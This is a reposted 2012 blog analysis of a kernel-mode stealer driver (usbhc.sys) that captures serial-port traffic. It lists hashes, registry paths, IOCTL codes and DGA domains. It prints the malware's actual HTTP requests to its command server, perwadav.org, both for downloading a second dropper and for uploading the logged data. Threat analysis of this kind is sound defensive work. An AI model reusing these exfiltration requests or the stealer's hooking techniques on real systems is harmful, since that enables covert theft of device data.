Investigation an interesting kernel mode stealer

[Nytro]

[h=1]Investigation an interesting kernel mode stealer[/h]

https://twitter.com/artem_i_baranov/status/228409424996352001

About two weeks ago my friend R136a1 from kernelmode forum came across with dropper that installs driver in the system. We decide make research of them, and it was not a mistake of starting it analyse...

Initial dropper hash:

SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74

MD5: 9c0744b8119df63371b83724bafe2095

File size: 32768 bytes

On this moment can tell exactly that only one or two vendors identified it with malware family.

Main purpose of dropper - extract driver from itself and install it in the system.

Driver masked as USB-driver and always extracted with same name - usbhc.sys.

Hash:

SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74

MD5: 9c0744b8119df63371b83724bafe2095

File size: 32768 bytes

One of the most strange thing that I discovered - driver is a fully standalone and not receives commands from user mode. And of course, it not create device object and symbolic link. for user mode interaction.

Research led me to a conclusion that driver has one main purpose - stealing data from devices that connect to serial ports of computer and sending it to remote server...

For stealing data from these devices it performs preparatory operations.

First, it reads the contents of \REGISTRY\MACHINE\HardWare\DeviceMap\SERIALCOMM that stores devices attached to serial ports [devices representing serial ports].

Second, it performs attaching to all this devices.

After rootkit attached it device, device stack of serial has view:

Second very interesting thing in this case that all network-based communication with remote server also found in driver:

- DGA (Domain Generation Algorithm)

- DNS via UDP (for convert domain names into IP)

- HTTP-based communication via TCP

- Special communication with ndisrd.sys driver.

For retrieving domains and resolve it to IP-addresses, driver uses such technique. First, it looking for DhcpNameServer parameter for each interface that it found at

\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

On next step, it generates domains and calls DNS-service for response about it status.

All further communication will be done through this server (which was received via DNS). In the end of post listed all domains that it polls.

Network communication completely based on TDI (Transport Device Interface) [look WDK for it description or this tutorial Driver Development Part 5: Introduction to the Transport Device Interface - CodeProject]

Preparing the server connection has the form (in SDK term - creating socket).

Next it will connect to remote server:

Internally in driver, socket described by this structure:

struct TDI_CONNECTION_INTERNAL

{

PFILE_OBJECT foTransportAddress;

HANDLE hTransportAddress;

PVOID foConnection;

HANDLE hConnection;

....

}

After connection with server was set, it can send requests to it via HTTP. Requests have view:

GET /srv.php?&id=uniqueID&mark=METKA&special_marker_opt HTTP/1.1

Accept-Language: en

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: host

Connection: close

Simple communication with server has view (rollcall):

->

GET /srv.php?&id=GOG73FRHOBFI&mark=METKA HTTP/1.1

Accept-Language: en

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: perwadav.org

Connection: close

<-

HTTP/1.1 200 OK..Date: Mon, 23 Jul 2012 17:13:16 GMT

Server: Apache/2.2.3 (CentOS)..X-Powered-By: PHP/5.1.6

Content-Length: 20

Connection: close

Content-Type: text/html; charset=UTF-8

SERVERISOK -> server status

After connection was established, driver performs downloads a dropper of ndisrd.sys from server, with request:

GET /srv.php?&id=uniqueID&mark=METKA&f=os_ver HTTP/1.1

Variable of os_ver has view n_xp_32 or n_7_32

Basic requests formed with func:

Conversation:

Driver perform saving dropper into:

\SystemRoot\System32\kb_random.exe

In my case:

\SystemRoot\System32\kbVOTHBNAU.exe

From driver:

Downloaded dropper:

SHA1: 911c027e5f4acf4a75d0cf8e751d0ba8fbbd0959

MD5: a93b5454f4492a4a8d971811f2d12b1e

File size: 81805 bytes

After dropper was downloaded, it will be installed by driver. Installation performs in context of trusted process - explorer or services (in depend of OS version).

Purpose of downloaded dropper - installation of ndisrd.sys driver.

Rootkit driver performs opening device of ndisrd.

Purpose of IOCTLs that rootkit sends to NDISRD could not identified, but there is a list of them:

830020D0

830020D4

830020D8

830020DC

830020C4

As I said before main purpose of rootkit - stealing data from serial devices and sending it to server. Stealing of data performed with registering of completion routine in Write and Read - IRP-dispatch functions. Driver registers the device in the chain of serial-devices, and can see all requests that pass through the chain.

IRP_MJ_READ handler - registers completion routine and calls next on the stack.

Completion routine has view:

After data was captured, wakes up a special thread, which writes cached data to a file.

Thread writes data to file - \SystemRoot\System32\svlog.log.

After data was written, thread sets a special event which signaling that data was written to file.

Thread that response for sending data from file to server:

->

GET /srv.php?&id=GOG73FRHOBFI&mark=METKA&a= HTTP/1.1

Accept-Language: en

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: perwadav.org

Connection: close

Data of file

<-

HTTP/1.1 200 OK..Date: Mon, 23 Jul 2012 17:13:16 GMT

Server: Apache/2.2.3 (CentOS)..X-Powered-By: PHP/5.1.6

Content-Length: 20

Connection: close

Content-Type: text/html; charset=UTF-8

SERVERISOK -> server status

Information about malicious domain:

This guy linkedin profile

Nikolay Petrachkov | LinkedIn.

You can download paper about dropper by R136a1 here

http://artemonsecurity.com/research_of_unk_malware.pdf

List of domains:

oqdxvvbk.com

perwadav.org

ebcgndvj.org

qdrhandp.org

tbkfopaf.org

twmhimdj.org

thgdabbj.com

efjwirmb.org

qxkomgei.com

bbfsyfsr.com

jbpgfqra.org

anwfejhx.com

frstfnuh.org

xbcfgule.com

cyfohwwf.com

catjdhuu.org

woyhiepx.org

fmegpykr.com

bowgtptk.com

dnrdyute.org

jchgbmmo.org

poxldxhv.org

mkrhwons.org

aovinvsi.org

ivogeuom.com

mubrnyxd.org

emhedcxc.org

ibqanwif.org

umspakwh.org

wianbpdb.com

oejkewmq.org

gqnjmmgd.org

lpdbwrfu.com

kwkdraat.org

dfogsbau.org

gjfxavjw.org

idrlbacl.org

xavostmi.org

sxdhddbb.com

wbqwvapj.org

jiqcsvng.com

gkceusvc.com

vssqfbmq.org

pcawxcwp.com

lpjnerpe.org

safcoyho.com

llbeoaix.com

oirhxgpf.org

ygdmlsgl.org

fyxfattr.com

tdcqhkne.com

wwdstess.org

eexeufwo.org

wbwfjosa.org

ixskfbvp.org

fmcspasm.org

wdjjkmwv.com

svpaidvo.org

vnhcftma.org

twjotfct.org

fwlckqdv.org

bjfgwabb.com

cdobjfic.org

qjfhsiua.org

enldxohy.com

dcnpyqlg.org

nsbjdfyq.org

cyhwpiaw.org

mnbpwbjj.org

volgbbox.org

tgrwfjpv.com

lgqxwrkf.org

xwalgbjg.com

yuwbhxeu.com

hulosvof.org

qxpvprdy.com

ijjxoocp.org

fbrebqna.com

tpxirylu.com

keukrpqf.org

rxyjkcwj.org

oucmtrhv.com

rxftpvku.com

wlxrrqyd.org

ybljdhos.org

qwkpxcct.org

qecgrdxg.org

dudfymdl.org

sesjvgii.com

yxcxjriu.org

ljmiphjx.org

btotkygq.org

fodbotqn.org

rfsojypy.com

mbdoebhh.org

johqyxsw.org

gldfgkey.com

fvpujviq.org

fyclctjf.org

xnvwdmyf.org

posted by https://twitter.com/artem_i_baranov

Posted 26th July 2012 by Artem

Sursa: Security/malware blog: Investigation an interesting kernel mode stealer